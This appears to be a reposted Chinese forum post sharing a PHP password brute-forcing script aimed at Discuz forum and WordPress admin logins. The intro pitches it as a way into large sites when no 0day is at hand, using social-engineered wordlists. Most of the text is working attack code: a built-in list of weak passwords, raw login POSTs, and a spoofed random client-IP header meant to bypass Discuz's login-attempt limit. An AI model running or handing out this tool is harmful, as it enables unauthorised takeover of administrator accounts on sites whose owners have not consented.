当你觉得传统信息安全手段都用完了的时候,你是否想过还有暴力破解啊。现在一般的大型网站都是dz论坛跟wp博客,没有0DAY在手怎么办啊,你忘了一句话叫做不怕神一样的对手只怕猪一样的队友啊,结合非传统的社工工程学收集信息,制作字典,最后进行fuzz。没事写了个PHP版的fuzz,只写了dz跟wp的模块,有兴趣的朋友自己添加其他模块。有好的常用弱口令的同学麻烦在此帖共享下。另外没有写自动抓取dz管理员列表跟wp管理员列表的脚本,大家还是google一下你就知道吧,然后放在user.txt里面进行fuzz。下次一定补上这个功能。
以下是效果图:
<?php
if ($argc < 3) {
print_r('
============================================================
author : Chora
example: ' . $argv[0] . ' Host dz (utf8)
example: ' . $argv[0] . ' Host dz gbk
example: ' . $argv[0] . ' Host wp gbk
example: ' . $argv[0] . ' Host Type Gbk/Utf8
============================================================
');
die();
}
define("DZ", "/admin.php"); //定义Discuz登陆地址
define("WP", "/wp-login.php");//定义WordPress登陆地址
$host = $argv[1];
$type = strtoupper($argv[2]);
$code = strtoupper($argv[3]);
function send($url, $post, $cookie, $header, $ip)
{
global $host;
$data = ($post ? "POST " : "GET ") . $url . " HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Accept-Encoding: gzip, deflate\r\n";
$data .= $cookie ? $cookie . "\r\n" : "";
$data .= $ip ? "Client_Ip: $ip\r\n" : "";
$data .= $post ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
$data .= $post ? "Content-Length: " . strlen($post) . "\r\n" : "";
$data .= "Connection: close\r\n\r\n";
$data .= $post ? "$post\r\n\r\n" : "";
$fp = fsockopen(gethostbyname($host), 80, $errno, $errstr);
if ($fp) {
fputs($fp, $data);
while (!feof($fp)) {
$html .= fread($fp, 8192);
}
fclose($fp);
return $html;
} else {
die("Could not Connect to $host $errno:$errstr");
}
}
function match($result)
{
return preg_match('/302 Found/i', $result); //自定义关键词
}
function ip() //绕过Discuz的限制登陆次数
{
$ip[1] = rand(0, 255);
$ip[2] = rand(0, 255);
$ip[3] = rand(0, 255);
$ip[4] = rand(0, 255);
$ip = implode('.', $ip);
return $ip;
}
function encode($arr, $code)
{
foreach ($arr as $value) {
if ($code == 'GBK') {
$value = gbk($value);
}
$value = trim($value);
$encode[] = rawurlencode($value);
}
return $encode;
}
function gbk($string)//转化为GBK编码,默认为UTF8,主要针对于Discuz含有中文的管理员
{
return iconv("UTF-8", "GBK", $string);
}
function cut($dic)
{
$dic = explode("\r\n", $dic);
array_shift($dic);
array_pop($dic);
return $dic;
}
//内置用户名
$user = "
admin
管理员
";
//内置密码
$pass = "
admin
123456
admin888
1234567
12345678
123456789
987654321
87654321
7654321
654321
555555
111111
666666
888888
88888888
000000
00000000
5201314
5211314
asdfgh
";
//可外接用户自定义用户名跟密码:user.txt(用户名),pass.txt(密码)
if (!file_exists('user.txt')) {
if (file_exists('pass.txt')) {
$user = cut($user);
$pass = file('pass.txt');
} else {
$user = cut($user);
$pass = cut($pass);
}
} elseif (file_exists('user.txt')) {
if (file_exists('pass.txt')) {
$user = file('user.txt');
$pass = file('pass.txt');
} else {
$user = file('user.txt');
$pass = cut($pass);
}
}
$user = encode($user, $code);
$pass = encode($pass, $code);
function crackdz()
{
global $user, $pass;
foreach ($user as $username) {
foreach ($pass as $password) {
$post = "admin_username=$username&admin_password=$password";
$result = send(DZ, $post, '', '', ip());
if (match($result)) {
echo "Found[*] Username: " . rawurldecode($username) . " Password: $password\r\n";
$found = 1;
}
}
}
if (!$found) {
echo 'Not Found!';
}
exit();
}
function crackwp()
{
global $user, $pass;
foreach ($user as $username) {
foreach ($pass as $password) {
$post = "log=$username&pwd=$password";
$result = send(WP, $post, '', '', '');
if (match($result)) {
echo "Found[*] Username: $username Password: $password\r\n";
$found = 1;
}
}
}
if (!$found) {
echo 'Not Found!';
}
exit();
}
if ($type == 'DZ') {
crackdz();
} elseif ($type == 'WP') {
crackwp();
}
?>
转自:http://zone.wooyun.org/content/8760
转载于:https://blog.51cto.com/0daysec/1571495